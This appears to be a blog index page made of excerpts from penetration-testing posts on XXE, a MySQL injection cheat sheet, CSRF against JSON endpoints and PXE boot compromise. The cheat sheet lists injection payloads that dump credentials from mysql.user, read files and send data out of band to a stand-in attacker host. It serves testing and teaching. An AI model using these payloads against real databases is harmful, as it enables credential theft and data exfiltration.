Here’s a quick write-up on XXE, starting with how to detect the vulnerability and moving on to how to fix it! XXE is a vulnerability in the way that XML parses handle user input and if an attacker is able to enter arbitrary or crafted data into an XML parser they may be able to inject entities and this could leave to file disclosure, denial-of-service attacks or in rare cases – code execution!
MSSQLMySQL Comments # /* — – ;%00 Version SELECT VERSION(); SELECT @@VERSION; SELECT @@GLOBAL.VERSION; User details user() current_user() system_user() session_user() SELECT user,password FROM mysql.user; Database details SELECT db_name(); SELECT database(); SELECT schema_name FROM information_schema.schemata; Database credentials SELECT host, user, password FROM mysql.user; Server details SELECT @@hostname; Table Name SELECT table_name FROM information_schema.tables; Columns Names SELECT column_name FROM information_schema.columns WHERE table_name = ‘tablename’; No Quotes CONCAT(CHAR(97), CHAR(98), CHAR(99)) String Concatenation CONCAT(foo, bar) Conditionals SELECT IF(1=1,’true’,’false’); Time-delay Sleep(10) Command Execution http://dev.mysql.com/doc/refman/5.1/en/adding-udf.html “RunAs” N/A Read Files SELECT LOAD_FILE(‘C:Windowswin.ini’); Out-of-Band Retrieval SELECT LOAD_FILE(concat(‘\\’,(SELECT 1), ‘attacker.controlledserver.com\’))); Substrings SELECT substr(‘Foobr’, 1, 1); Retrieve Nth Line SELECT …
Today I found a possible Cross-site Request Forgery vulnerability in a web application, however – the application expected JSON as its input. The fact that the input is JSON means that the attack is a little bit more complicated, the browsers built in protections get in the way a little more. So here’s some notes and tricks which might help a little!
Pre-Execution Boot, or PXE, is a method of booting a workstation machine by loading an operating system across the network. If PXE boot can be enabled (often it is enabled by default, even when machines are restricted from booting CDs or USB Devices) then an stripped down Linux operating system can be loaded over the network and used to compromise the target.